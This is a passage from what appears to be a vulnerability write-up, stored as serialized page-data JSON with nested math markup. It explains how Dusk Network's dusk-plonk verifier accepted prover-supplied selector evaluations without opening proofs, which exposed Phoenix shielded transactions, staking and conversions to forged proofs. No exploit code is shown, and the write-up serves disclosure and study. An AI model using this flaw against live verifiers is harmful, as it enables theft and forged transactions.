4062},{"className":144061,"style":3720},[3719],[],{"type":28,"tag":116,"props":144064,"children":144066},{"className":144065},[3725,3726,3727,3728],[144067],{"type":28,"tag":116,"props":144068,"children":144070},{"className":144069},[3680,3728],[144071],{"type":33,"value":1824},{"type":28,"tag":116,"props":144073,"children":144075},{"className":144074},[21407],[144076],{"type":33,"value":21410},{"type":28,"tag":116,"props":144078,"children":144080},{"className":144079},[3705],[144081],{"type":28,"tag":116,"props":144082,"children":144084},{"className":144083,"style":92746},[3710],[144085],{"type":28,"tag":116,"props":144086,"children":144087},{},[],{"type":28,"tag":116,"props":144089,"children":144091},{"className":144090},[21380],[144092],{"type":33,"value":313},{"type":28,"tag":116,"props":144094,"children":144096},{"className":144095,"style":113217},[3680,21251],[144097],{"type":33,"value":113220},{"type":28,"tag":116,"props":144099,"children":144101},{"className":144100},[21401],[144102],{"type":33,"value":1829},{"type":33,"value":144104},", the public-input polynomial at ",{"type":28,"tag":98,"props":144106,"children":144108},{"className":144107},[3652,3653],[144109],{"type":28,"tag":116,"props":144110,"children":144112},{"className":144111},[3658],[144113],{"type":28,"tag":116,"props":144114,"children":144116},{"className":144115,"ariaHidden":3664},[3663],[144117],{"type":28,"tag":116,"props":144118,"children":144120},{"className":144119},[3669],[144121,144125],{"type":28,"tag":116,"props":144122,"children":144124},{"className":144123,"style":110501},[3674],[],{"type":28,"tag":116,"props":144126,"children":144128},{"className":144127,"style":113217},[3680,21251],[144129],{"type":33,"value":113220},{"type":33,"value":144131},"), which are safe because the prover never chooses them. Other values are prover-supplied evaluations accompanied by KZG opening proofs (",{"type":28,"tag":98,"props":144133,"children":144135},{"className":144134},[3652,3653],[144136],{"type":28,"tag":116,"props":144137,"children":144139},{"className":144138},[3658],[144140],{"type":28,"tag":116,"props":144141,"children":144143},{"className":144142,"ariaHidden":3664},[3663],[144144],{"type":28,"tag":116,"props":144145,"children":144147},{"className":144146},[3669],[144148,144152,144157,144162,144167],{"type":28,"tag":116,"props":144149,"children":144151},{"className":144150,"style":3780},[3674],[],{"type":28,"tag":116,"props":144153,"children":144155},{"className":144154},[3680,21251],[144156],{"type":33,"value":87},{"type":28,"tag":116,"props":144158,"children":144160},{"className":144159},[21380],[144161],{"type":33,"value":313},{"type":28,"tag":116,"props":144163,"children":144165},{"className":144164,"style":113217},[3680,21251],[144166],{"type":33,"value":113220},{"type":28,"tag":116,"props":144168,"children":144170},{"className":144169},[21401],[144171],{"type":33,"value":1829},{"type":33,"value":825},{"type":28,"tag":98,"props":144174,"children":144176},{"className":144175},[3652,3653],[144177],{"type":28,"tag":116,"props":144178,"children":144180},{"className":144179},[3658],[144181],{"type":28,"tag":116,"props":144182,"children":144184},{"className":144183,"ariaHidden":3664},[3663],[144185],{"type":28,"tag":116,"props":144186,"children":144188},{"className":144187},[3669],[144189,144193,144198,144203,144208],{"type":28,"tag":116,"props":144190,"children":144192},{"className":144191,"style":3780},[3674],[],{"type":28,"tag":116,"props":144194,"children":144196},{"className":144195},[3680,21251],[144197],{"type":33,"value":2893},{"type":28,"tag":116,"props":144199,"children":144201},{"className":144200},[21380],[144202],{"type":33,"value":313},{"type":28,"tag":116,"props":144204,"children":144206},{"className":144205,"style":113217},[3680,21251],[144207],{"type":33,"value":113220},{"type":28,"tag":116,"props":144209,"children":144211},{"className":144210},[21401],[144212],{"type":33,"value":1829},{"type":33,"value":825},{"type":28,"tag":98,"props":144215,"children":144217},{"className":144216},[3652,3653],[144218],{"type":28,"tag":116,"props":144219,"children":144221},{"className":144220},[3658],[144222],{"type":28,"tag":116,"props":144223,"children":144225},{"className":144224,"ariaHidden":3664},[3663],[144226],{"type":28,"tag":116,"props":144227,"children":144229},{"className":144228},[3669],[144230,144234,144292,144297,144302],{"type":28,"tag":116,"props":144231,"children":144233},{"className":144232,"style":3780},[3674],[],{"type":28,"tag":116,"props":144235,"children":144237},{"className":144236},[3680],[144238,144244],{"type":28,"tag":116,"props":144239,"children":144241},{"className":144240,"style":93149},[3680,21251],[144242],{"type":33,"value":144243},"σ",{"type":28,"tag":116,"props":144245,"children":144247},{"className":144246},[3695],[144248],{"type":28,"tag":116,"props":144249,"children":144251},{"className":144250},[3700,21305],[144252,144281],{"type":28,"tag":116,"props":144253,"children":144255},{"className":144254},[3705],[144256,144276],{"type":28,"tag":116,"props":144257,"children":144259},{"className":144258,"style":92715},[3710],[144260],{"type":28,"tag":116,"props":144261,"children":144262},{"style":93196},[144263,144267],{"type":28,"tag":116,"props":144264,"children":144266},{"className":144265,"style":3720},[3719],[],{"type":28,"tag":116,"props":144268,"children":144270},{"className":144269},[3725,3726,3727,3728],[144271],{"type":28,"tag":116,"props":144272,"children":144274},{"className":144273},[3680,3728],[144275],{"type":33,"value":1824},{"type":28,"tag":116,"props":144277,"children":144279},{"className":144278},[21407],[144280],{"type":33,"value":21410},{"type":28,"tag":116,"props":144282,"children":144284},{"className":144283},[3705],[144285],{"type":28,"tag":116,"props":144286,"children":144288},{"className":144287,"style":92746},[3710],[144289],{"type":28,"tag":116,"props":144290,"children":144291},{},[],{"type":28,"tag":116,"props":144293,"children":144295},{"className":144294},[21380],[144296],{"type":33,"value":313},{"type":28,"tag":116,"props":144298,"children":144300},{"className":144299,"style":113217},[3680,21251],[144301],{"type":33,"value":113220},{"type":28,"tag":116,"props":144303,"children":144305},{"className":144304},[21401],[144306],{"type":33,"value":1829},{"type":33,"value":825},{"type":28,"tag":98,"props":144309,"children":144311},{"className":144310},[3652,3653],[144312],{"type":28,"tag":116,"props":144313,"children":144315},{"className":144314},[3658],[144316],{"type":28,"tag":116,"props":144317,"children":144319},{"className":144318,"ariaHidden":3664},[3663],[144320],{"type":28,"tag":116,"props":144321,"children":144323},{"className":144322},[3669],[144324,144328,144333,144338,144343,144349],{"type":28,"tag":116,"props":144325,"children":144327},{"className":144326,"style":3780},[3674],[],{"type":28,"tag":116,"props":144329,"children":144331},{"className":144330},[3680,21251],[144332],{"type":33,"value":87},{"type":28,"tag":116,"props":144334,"children":144336},{"className":144335},[21380],[144337],{"type":33,"value":313},{"type":28,"tag":116,"props":144339,"children":144341},{"className":144340,"style":113217},[3680,21251],[144342],{"type":33,"value":113220},{"type":28,"tag":116,"props":144344,"children":144346},{"className":144345,"style":93149},[3680,21251],[144347],{"type":33,"value":144348},"ω",{"type":28,"tag":116,"props":144350,"children":144352},{"className":144351},[21401],[144353],{"type":33,"value":1829},{"type":33,"value":144355},"), which are safe because the opening binds them to previously committed polynomials. A third category consists of verifier-key commitments used directly in the linearization multiscalar multiplication (",{"type":28,"tag":98,"props":144357,"children":144359},{"className":144358},[3652,3653],[144360],{"type":28,"tag":116,"props":144361,"children":144363},{"className":144362},[3658],[144364],{"type":28,"tag":116,"props":144365,"children":144367},{"className":144366,"ariaHidden":3664},[3663],[144368],{"type":28,"tag":116,"props":144369,"children":144371},{"className":144370},[3669],[144372,144376,144381,144438],{"type":28,"tag":116,"props":144373,"children":144375},{"className":144374,"style":3780},[3674],[],{"type":28,"tag":116,"props":144377,"children":144379},{"className":144378},[21380],[144380],{"type":33,"value":347},{"type":28,"tag":116,"props":144382,"children":144384},{"className":144383},[3680],[144385,144390],{"type":28,"tag":116,"props":144386,"children":144388},{"className":144387,"style":93149},[3680,21251],[144389],{"type":33,"value":93152},{"type":28,"tag":116,"props":144391,"children":144393},{"className":144392},[3695],[144394],{"type":28,"tag":116,"props":144395,"children":144397},{"className":144396},[3700,21305],[144398,144427],{"type":28,"tag":116,"props":144399,"children":144401},{"className":144400},[3705],[144402,144422],{"type":28,"tag":116,"props":144403,"children":144405},{"className":144404,"style":142213},[3710],[144406],{"type":28,"tag":116,"props":144407,"children":144408},{"style":93196},[144409,144413],{"type":28,"tag":116,"props":144410,"children":144412},{"className":144411,"style":3720},[3719],[],{"type":28,"tag":116,"props":144414,"children":144416},{"className":144415},[3725,3726,3727,3728],[144417],{"type":28,"tag":116,"props":144418,"children":144420},{"className":144419,"style":94671},[3680,21251,3728],[144421],{"type":33,"value":94674},{"type":28,"tag":116,"props":144423,"children":144425},{"className":144424},[21407],[144426],{"type":33,"value":21410},{"type":28,"tag":116,"props":144428,"children":144430},{"className":144429},[3705],[144431],{"type":28,"tag":116,"props":144432,"children":144434},{"className":144433,"style":92746},[3710],[144435],{"type":28,"tag":116,"props":144436,"children":144437},{},[],{"type":28,"tag":116,"props":144439,"children":144441},{"className":144440},[21401],[144442],{"type":33,"value":15074},{"type":33,"value":825},{"type":28,"tag":98,"props":144445,"children":144447},{"className":144446},[3652,3653],[144448],{"type":28,"tag":116,"props":144449,"children":144451},{"className":144450},[3658],[144452],{"type":28,"tag":116,"props":144453,"children":144455},{"className":144454,"ariaHidden":3664},[3663],[144456],{"type":28,"tag":116,"props":144457,"children":144459},{"className":144458},[3669],[144460,144464,144469,144526],{"type":28,"tag":116,"props":144461,"children":144463},{"className":144462,"style":3780},[3674],[],{"type":28,"tag":116,"props":144465,"children":144467},{"className":144466},[21380],[144468],{"type":33,"value":347},{"type":28,"tag":116,"props":144470,"children":144472},{"className":144471},[3680],[144473,144478],{"type":28,"tag":116,"props":144474,"children":144476},{"className":144475,"style":93149},[3680,21251],[144477],{"type":33,"value":93152},{"type":28,"tag":116,"props":144479,"children":144481},{"className":144480},[3695],[144482],{"type":28,"tag":116,"props":144483,"children":144485},{"className":144484},[3700,21305],[144486,144515],{"type":28,"tag":116,"props":144487,"children":144489},{"className":144488},[3705],[144490,144510],{"type":28,"tag":116,"props":144491,"children":144493},{"className":144492,"style":142213},[3710],[144494],{"type":28,"tag":116,"props":144495,"children":144496},{"style":93196},[144497,144501],{"type":28,"tag":116,"props":144498,"children":144500},{"className":144499,"style":3720},[3719],[],{"type":28,"tag":116,"props":144502,"children":144504},{"className":144503},[3725,3726,3727,3728],[144505],{"type":28,"tag":116,"props":144506,"children":144508},{"className":144507,"style":92663},[3680,21251,3728],[144509],{"type":33,"value":114979},{"type":28,"tag":116,"props":144511,"children":144513},{"className":144512},[21407],[144514],{"type":33,"value":21410},{"type":28,"tag":116,"props":144516,"children":144518},{"className":144517},[3705],[144519],{"type":28,"tag":116,"props":144520,"children":144522},{"className":144521,"style":92746},[3710],[144523],{"type":28,"tag":116,"props":144524,"children":144525},{},[],{"type":28,"tag":116,"props":144527,"children":144529},{"className":144528},[21401],[144530],{"type":33,"value":15074},{"type":33,"value":825},{"type":28,"tag":98,"props":144533,"children":144535},{"className":144534},[3652,3653],[144536],{"type":28,"tag":116,"props":144537,"children":144539},{"className":144538},[3658],[144540],{"type":28,"tag":116,"props":144541,"children":144543},{"className":144542,"ariaHidden":3664},[3663],[144544],{"type":28,"tag":116,"props":144545,"children":144547},{"className":144546},[3669],[144548,144552,144557,144614],{"type":28,"tag":116,"props":144549,"children":144551},{"className":144550,"style":3780},[3674],[],{"type":28,"tag":116,"props":144553,"children":144555},{"className":144554},[21380],[144556],{"type":33,"value":347},{"type":28,"tag":116,"props":144558,"children":144560},{"className":144559},[3680],[144561,144566],{"type":28,"tag":116,"props":144562,"children":144564},{"className":144563,"style":93149},[3680,21251],[144565],{"type":33,"value":144243},{"type":28,"tag":116,"props":144567,"children":144569},{"className":144568},[3695],[144570],{"type":28,"tag":116,"props":144571,"children":144573},{"className":144572},[3700,21305],[144574,144603],{"type":28,"tag":116,"props":144575,"children":144577},{"className":144576},[3705],[144578,144598],{"type":28,"tag":116,"props":144579,"children":144581},{"className":144580,"style":92715},[3710],[144582],{"type":28,"tag":116,"props":144583,"children":144584},{"style":93196},[144585,144589],{"type":28,"tag":116,"props":144586,"children":144588},{"className":144587,"style":3720},[3719],[],{"type":28,"tag":116,"props":144590,"children":144592},{"className":144591},[3725,3726,3727,3728],[144593],{"type":28,"tag":116,"props":144594,"children":144596},{"className":144595},[3680,3728],[144597],{"type":33,"value":17190},{"type":28,"tag":116,"props":144599,"children":144601},{"className":144600},[21407],[144602],{"type":33,"value":21410},{"type":28,"tag":116,"props":144604,"children":144606},{"className":144605},[3705],[144607],{"type":28,"tag":116,"props":144608,"children":144610},{"className":144609,"style":92746},[3710],[144611],{"type":28,"tag":116,"props":144612,"children":144613},{},[],{"type":28,"tag":116,"props":144615,"children":144617},{"className":144616},[21401],[144618],{"type":33,"value":15074},{"type":33,"value":144620},"), which are safe because the verifier never trusts a bare field element for these; it uses the commitment itself.",{"type":28,"tag":29,"props":144622,"children":144623},{},[144624],{"type":33,"value":144625},"Any term that falls outside those three categories is attacker-controlled by construction.",{"type":28,"tag":18457,"props":144627,"children":144628},{},[],{"type":28,"tag":63,"props":144630,"children":144632},{"id":144631},"where-dusk-plonk-differs-from-textbook-plonk",[144633],{"type":33,"value":144634},"Where dusk-plonk differs from textbook PLONK",{"type":28,"tag":29,"props":144636,"children":144637},{},[144638,144647,144649,144654,144656,144686],{"type":28,"tag":87,"props":144639,"children":144641},{"href":141513,"rel":144640},[91],[144642],{"type":28,"tag":98,"props":144643,"children":144645},{"className":144644},[],[144646],{"type":33,"value":141517},{"type":33,"value":144648}," is not a literal transcription of the 2019 PLONK paper. It extends the arithmetic gate with a fourth wire ",{"type":28,"tag":98,"props":144650,"children":144652},{"className":144651},[],[144653],{"type":33,"value":70183},{"type":33,"value":144655},", adds custom widgets for range, logic, and elliptic-curve operations, uses shifted evaluations at ",{"type":28,"tag":98,"props":144657,"children":144659},{"className":144658},[3652,3653],[144660],{"type":28,"tag":116,"props":144661,"children":144663},{"className":144662},[3658],[144664],{"type":28,"tag":116,"props":144665,"children":144667},{"className":144666,"ariaHidden":3664},[3663],[144668],{"type":28,"tag":116,"props":144669,"children":144671},{"className":144670},[3669],[144672,144676,144681],{"type":28,"tag":116,"props":144673,"children":144675},{"className":144674,"style":110501},[3674],[],{"type":28,"tag":116,"props":144677,"children":144679},{"className":144678,"style":113217},[3680,21251],[144680],{"type":33,"value":113220},{"type":28,"tag":116,"props":144682,"children":144684},{"className":144683,"style":93149},[3680,21251],[144685],{"type":33,"value":144348},{"type":33,"value":144687},", and heavily batches KZG openings. None of that is exotic by modern PLONK standards, but it does make the verifier harder to reason about than the minimal paper presentation.",{"type":28,"tag":29,"props":144689,"children":144690},{},[144691,144693,144698,144699,144704,144706,144712,144714,144721],{"type":33,"value":144692},"The important part for this bug is the boundary between ",{"type":28,"tag":4995,"props":144694,"children":144695},{},[144696],{"type":33,"value":144697},"public circuit data",{"type":33,"value":10659},{"type":28,"tag":4995,"props":144700,"children":144701},{},[144702],{"type":33,"value":144703},"prover claims about that data at the random challenge point",{"type":33,"value":144705},". Parallel implementations avoid this ambiguity by keeping selector polynomials strictly out of the prover's hands. For example, Consensys' gnark (one of the most widely deployed PLONK implementations) never asks the prover for selector evaluations at all. Instead, the verifier incorporates the selector commitments ",{"type":28,"tag":98,"props":144707,"children":144709},{"className":144708},[],[144710],{"type":33,"value":144711},"Ql, Qr, Qm, Qo, Qk",{"type":33,"value":144713}," directly into the ",{"type":28,"tag":87,"props":144715,"children":144718},{"href":144716,"rel":144717},"https://github.com/Consensys/gnark/blob/17b079f1b813d9dafd465202466b09f282b4c5e9/backend/plonk/bls12-381/verify.go#L253-L270",[91],[144719],{"type":33,"value":144720},"linearization multi-scalar multiplication",{"type":33,"value":144722},", ensuring their values are cryptographically bound by construction.",{"type":28,"tag":29,"props":144724,"children":144725},{},[144726,144728,144753],{"type":33,"value":144727},"Dusk's custom widgets were more complex (multiplying selectors with other evaluated terms), so they could not just use a simple linear combination of commitments. Their architecture required evaluating the selectors at ",{"type":28,"tag":98,"props":144729,"children":144731},{"className":144730},[3652,3653],[144732],{"type":28,"tag":116,"props":144733,"children":144735},{"className":144734},[3658],[144736],{"type":28,"tag":116,"props":144737,"children":144739},{"className":144738,"ariaHidden":3664},[3663],[144740],{"type":28,"tag":116,"props":144741,"children":144743},{"className":144742},[3669],[144744,144748],{"type":28,"tag":116,"props":144745,"children":144747},{"className":144746,"style":110501},[3674],[],{"type":28,"tag":116,"props":144749,"children":144751},{"className":144750,"style":113217},[3680,21251],[144752],{"type":33,"value":113220},{"type":33,"value":144754}," and using those scalars. But while they serialized those four selector evaluations into the proof struct, they never actually verified them against the verifier key's commitments through an opening proof.",{"type":28,"tag":29,"props":144756,"children":144757},{},[144758],{"type":33,"value":144759},"The shortest way to see the bug is the graph below: safe values flow through the opening path toward the final pairing check, while the red selector flow enters verifier logic without ever touching an opening proof.",{"type":28,"tag":144761,"props":144762,"children":144763},"dusk-verifier-dependence-graph",{},[],{"type":28,"tag":18457,"props":144765,"children":144766},{},[],{"type":28,"tag":63,"props":144768,"children":144770},{"id":144769},"how-dusk-uses-plonk",[144771],{"type":33,"value":144772},"How Dusk uses PLONK",{"type":28,"tag":29,"props":144774,"children":144775},{},[144776,144782],{"type":28,"tag":87,"props":144777,"children":144779},{"href":141522,"rel":144778},[91],[144780],{"type":33,"value":144781},"Dusk Network",{"type":33,"value":144783}," is a privacy-focused L1 blockchain. Its transaction model has two modes:",{"type":28,"tag":2108,"props":144785,"children":144786},{},[144787,144792],{"type":28,"tag":459,"props":144788,"children":144789},{},[144790],{"type":33,"value":144791},"Phoenix (shielded): amounts and participants are hidden using ZK proofs, and every Phoenix transaction carries a PLONK proof that the transaction is valid.",{"type":28,"tag":459,"props":144793,"children":144794},{},[144795],{"type":33,"value":144796},"Moonlight (transparent): standard account-based transactions verified by BLS signatures, with no PLONK involvement.",{"type":28,"tag":29,"props":144798,"children":144799},{},[144800,144802,144813,144815,144826],{"type":33,"value":144801},"At node level, every ",{"type":28,"tag":87,"props":144803,"children":144806},{"href":144804,"rel":144805},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/node/vm.rs#L152-L185",[91],[144807],{"type":28,"tag":98,"props":144808,"children":144810},{"className":144809},[],[144811],{"type":33,"value":144812},"ProtocolTransaction::Phoenix",{"type":33,"value":144814}," goes through ",{"type":28,"tag":87,"props":144816,"children":144819},{"href":144817,"rel":144818},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/verifier.rs#L71-L82",[91],[144820],{"type":28,"tag":98,"props":144821,"children":144823},{"className":144822},[],[144824],{"type":33,"value":144825},"verify_proof_with_version()",{"type":33,"value":144827}," during preverification. If that PLONK proof verifies, the transaction is admitted to the mempool and can later be mined into a block. Moonlight-path transactions instead go through BLS signature verification.",{"type":28,"tag":29,"props":144829,"children":144830},{},[144831,144833,144844,144846,144857,144858,144869,144870,144881,144882,144893],{"type":33,"value":144832},"That same Phoenix proof path covers more than simple shielded transfers. Phoenix-path staking, reward withdrawals, unstaking, and Phoenix-to-Moonlight conversion all build a Phoenix transaction via ",{"type":28,"tag":87,"props":144834,"children":144837},{"href":144835,"rel":144836},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L54-L95",[91],[144838],{"type":28,"tag":98,"props":144839,"children":144841},{"className":144840},[],[144842],{"type":33,"value":144843},"phoenix()",{"type":33,"value":144845},", for example in ",{"type":28,"tag":87,"props":144847,"children":144850},{"href":144848,"rel":144849},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L144-L186",[91],[144851],{"type":28,"tag":98,"props":144852,"children":144854},{"className":144853},[],[144855],{"type":33,"value":144856},"phoenix_stake()",{"type":33,"value":825},{"type":28,"tag":87,"props":144859,"children":144862},{"href":144860,"rel":144861},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L240-L298",[91],[144863],{"type":28,"tag":98,"props":144864,"children":144866},{"className":144865},[],[144867],{"type":33,"value":144868},"phoenix_stake_reward()",{"type":33,"value":825},{"type":28,"tag":87,"props":144871,"children":144874},{"href":144872,"rel":144873},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L358-L416",[91],[144875],{"type":28,"tag":98,"props":144876,"children":144878},{"className":144877},[],[144879],{"type":33,"value":144880},"phoenix_unstake()",{"type":33,"value":6159},{"type":28,"tag":87,"props":144883,"children":144886},{"href":144884,"rel":144885},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L481-L539",[91],[144887],{"type":28,"tag":98,"props":144888,"children":144890},{"className":144889},[],[144891],{"type":33,"value":144892},"phoenix_to_moonlight()",{"type":33,"value":144894},". So if Phoenix proof verification is unsound, the entire shielded transaction path is exposed.",{"type":28,"tag":29,"props":144896,"children":144897},{},[144898],{"type":28,"tag":206,"props":144899,"children":144902},{"alt":144900,"src":144901},"phoenix_moonlight","/posts/dusk-commitment-issues/phoenix_moonlight.svg",[],{"type":28,"tag":29,"props":144904,"children":144905},{},[144906,144908,144914,144916,144923],{"type":33,"value":144907},"The PLONK implementation, ",{"type":28,"tag":87,"props":144909,"children":144912},{"href":144910,"rel":144911},"https://github.com/dusk-network/plonk",[91],[144913],{"type":33,"value":141517},{"type":33,"value":144915},", is a standalone library by the Dusk team. It was among the first PLONK implementations written, with development starting the same year ",{"type":28,"tag":87,"props":144917,"children":144920},{"href":144918,"rel":144919},"https://eprint.iacr.org/archive/2019/953/1566424053.pdf",[91],[144921],{"type":33,"value":144922},"the original paper",{"type":33,"value":144924}," was released.",{"type":28,"tag":29,"props":144926,"children":144927},{},[144928,144930,144936],{"type":33,"value":144929},"The Phoenix transaction PLONK circuit is defined ",{"type":28,"tag":87,"props":144931,"children":144934},{"href":144932,"rel":144933},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L20-L205",[91],[144935],{"type":33,"value":2039},{"type":33,"value":144937},". The circuit enforces the following set of constraints:",{"type":28,"tag":55363,"props":144939,"children":144940},{},[144941,144957],{"type":28,"tag":122611,"props":144942,"children":144943},{},[144944],{"type":28,"tag":122615,"props":144945,"children":144946},{},[144947,144952],{"type":28,"tag":122619,"props":144948,"children":144949},{},[144950],{"type":33,"value":144951},"Circuit check",{"type":28,"tag":122619,"props":144953,"children":144954},{},[144955],{"type":33,"value":144956},"Statement being checked",{"type":28,"tag":122639,"props":144958,"children":144959},{},[144960,144978,144996,145014,145032,145189,145329,145347],{"type":28,"tag":122615,"props":144961,"children":144962},{},[144963,144973],{"type":28,"tag":122646,"props":144964,"children":144965},{},[144966],{"type":28,"tag":87,"props":144967,"children":144970},{"href":144968,"rel":144969},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L106-L126",[91],[144971],{"type":33,"value":144972},"Merkle tree membership",{"type":28,"tag":122646,"props":144974,"children":144975},{},[144976],{"type":33,"value":144977},"Each input note hash is opened against the public Merkle root, so only notes already in the note tree may be spent",{"type":28,"tag":122615,"props":144979,"children":144980},{},[144981,144991],{"type":28,"tag":122646,"props":144982,"children":144983},{},[144984],{"type":28,"tag":87,"props":144985,"children":144988},{"href":144986,"rel":144987},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L70-L79",[91],[144989],{"type":33,"value":144990},"Input-note secret-key authorization",{"type":28,"tag":122646,"props":144992,"children":144993},{},[144994],{"type":33,"value":144995},"The prover knows the secret key controlling each input note",{"type":28,"tag":122615,"props":144997,"children":144998},{},[144999,145009],{"type":28,"tag":122646,"props":145000,"children":145001},{},[145002],{"type":28,"tag":87,"props":145003,"children":145006},{"href":145004,"rel":145005},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L81-L87",[91],[145007],{"type":33,"value":145008},"Nullifier correctness",{"type":28,"tag":122646,"props":145010,"children":145011},{},[145012],{"type":33,"value":145013},"Each nullifier matches the corresponding note key and position",{"type":28,"tag":122615,"props":145015,"children":145016},{},[145017,145027],{"type":28,"tag":122646,"props":145018,"children":145019},{},[145020],{"type":28,"tag":87,"props":145021,"children":145024},{"href":145022,"rel":145023},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L149-L160",[91],[145025],{"type":33,"value":145026},"Output value commitment correctness",{"type":28,"tag":122646,"props":145028,"children":145029},{},[145030],{"type":33,"value":145031},"Each public output commitment matches the secret output value and blinder",{"type":28,"tag":122615,"props":145033,"children":145034},{},[145035,145045],{"type":28,"tag":122646,"props":145036,"children":145037},{},[145038],{"type":28,"tag":87,"props":145039,"children":145042},{"href":145040,"rel":145041},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L167-L178",[91],[145043],{"type":33,"value":145044},"Balance integrity",{"type":28,"tag":122646,"props":145046,"children":145047},{},[145048],{"type":28,"tag":98,"props":145049,"children":145051},{"className":145050},[3652,3653],[145052],{"type":28,"tag":116,"props":145053,"children":145055},{"className":145054},[3658],[145056],{"type":28,"tag":116,"props":145057,"children":145059},{"className":145058,"ariaHidden":3664},[3663],[145060,145100,145140,145172],{"type":28,"tag":116,"props":145061,"children":145063},{"className":145062},[3669],[145064,145068,145073,145077,145087,145091,145096],{"type":28,"tag":116,"props":145065,"children":145067},{"className":145066,"style":3780},[3674],[],{"type":28,"tag":116,"props":145069,"children":145071},{"className":145070,"style":21294},[21287,21292,21293],[145072],{"type":33,"value":108455},{"type":28,"tag":116,"props":145074,"children":145076},{"className":145075,"style":3798},[3759],[],{"type":28,"tag":116,"props":145078,"children":145080},{"className":145079},[3680,33],[145081],{"type":28,"tag":116,"props":145082,"children":145084},{"className":145083},[3680],[145085],{"type":33,"value":145086},"inputs",{"type":28,"tag":116,"props":145088,"children":145090},{"className":145089,"style":3857},[3759],[],{"type":28,"tag":116,"props":145092,"children":145094},{"className":145093},[3862],[145095],{"type":33,"value":373},{"type":28,"tag":116,"props":145097,"children":145099},{"className":145098,"style":3857},[3759],[],{"type":28,"tag":116,"props":145101,"children":145103},{"className":145102},[3669],[145104,145108,145113,145117,145127,145131,145136],{"type":28,"tag":116,"props":145105,"children":145107},{"className":145106,"style":3780},[3674],[],{"type":28,"tag":116,"props":145109,"children":145111},{"className":145110,"style":21294},[21287,21292,21293],[145112],{"type":33,"value":108455},{"type":28,"tag":116,"props":145114,"children":145116},{"className":145115,"style":3798},[3759],[],{"type":28,"tag":116,"props":145118,"children":145120},{"className":145119},[3680,33],[145121],{"type":28,"tag":116,"props":145122,"children":145124},{"className":145123},[3680],[145125],{"type":33,"value":145126},"outputs",{"type":28,"tag":116,"props":145128,"children":145130},{"className":145129,"style":3760},[3759],[],{"type":28,"tag":116,"props":145132,"children":145134},{"className":145133},[3765],[145135],{"type":33,"value":2268},{"type":28,"tag":116,"props":145137,"children":145139},{"className":145138,"style":3760},[3759],[],{"type":28,"tag":116,"props":145141,"children":145143},{"className":145142},[3669],[145144,145149,145159,145163,145168],{"type":28,"tag":116,"props":145145,"children":145148},{"className":145146,"style":145147},[3674],"height:0.7778em;vertical-align:-0.0833em;",[],{"type":28,"tag":116,"props":145150,"children":145152},{"className":145151},[3680,33],[145153],{"type":28,"tag":116,"props":145154,"children":145156},{"className":145155},[3680],[145157],{"type":33,"value":145158},"fee",{"type":28,"tag":116,"props":145160,"children":145162},{"className":145161,"style":3760},[3759],[],{"type":28,"tag":116,"props":145164,"children":145166},{"className":145165},[3765],[145167],{"type":33,"value":2268},{"type":28,"tag":116,"props":145169,"children":145171},{"className":145170,"style":3760},[3759],[],{"type":28,"tag":116,"props":145173,"children":145175},{"className":145174},[3669],[145176,145180],{"type":28,"tag":116,"props":145177,"children":145179},{"className":145178,"style":114715},[3674],[],{"type":28,"tag":116,"props":145181,"children":145183},{"className":145182},[3680,33],[145184],{"type":28,"tag":116,"props":145185,"children":145187},{"className":145186},[3680],[145188],{"type":33,"value":61582},{"type":28,"tag":122615,"props":145190,"children":145191},{},[145192,145209],{"type":28,"tag":122646,"props":145193,"children":145194},{},[145195,145202,145203],{"type":28,"tag":87,"props":145196,"children":145199},{"href":145197,"rel":145198},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L89-L90",[91],[145200],{"type":33,"value":145201},"Range checks on inputs",{"type":33,"value":10659},{"type":28,"tag":87,"props":145204,"children":145207},{"href":145205,"rel":145206},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L141-L142",[91],[145208],{"type":33,"value":145126},{"type":28,"tag":122646,"props":145210,"children":145211},{},[145212,145214],{"type":33,"value":145213},"All note values lie in ",{"type":28,"tag":98,"props":145215,"children":145217},{"className":145216},[3652,3653],[145218],{"type":28,"tag":116,"props":145219,"children":145221},{"className":145220},[3658],[145222],{"type":28,"tag":116,"props":145223,"children":145225},{"className":145224,"ariaHidden":3664},[3663],[145226,145311],{"type":28,"tag":116,"props":145227,"children":145229},{"className":145228},[3669],[145230,145234,145239,145244,145249,145253,145298,145302,145307],{"type":28,"tag":116,"props":145231,"children":145233},{"className":145232,"style":114972},[3674],[],{"type":28,"tag":116,"props":145235,"children":145237},{"className":145236},[21380],[145238],{"type":33,"value":347},{"type":28,"tag":116,"props":145240,"children":145242},{"className":145241},[3680],[145243],{"type":33,"value":353},{"type":28,"tag":116,"props":145245,"children":145247},{"className":145246},[3791],[145248],{"type":33,"value":3794},{"type":28,"tag":116,"props":145250,"children":145252},{"className":145251,"style":3798},[3759],[],{"type":28,"tag":116,"props":145254,"children":145256},{"className":145255},[3680],[145257,145262],{"type":28,"tag":116,"props":145258,"children":145260},{"className":1452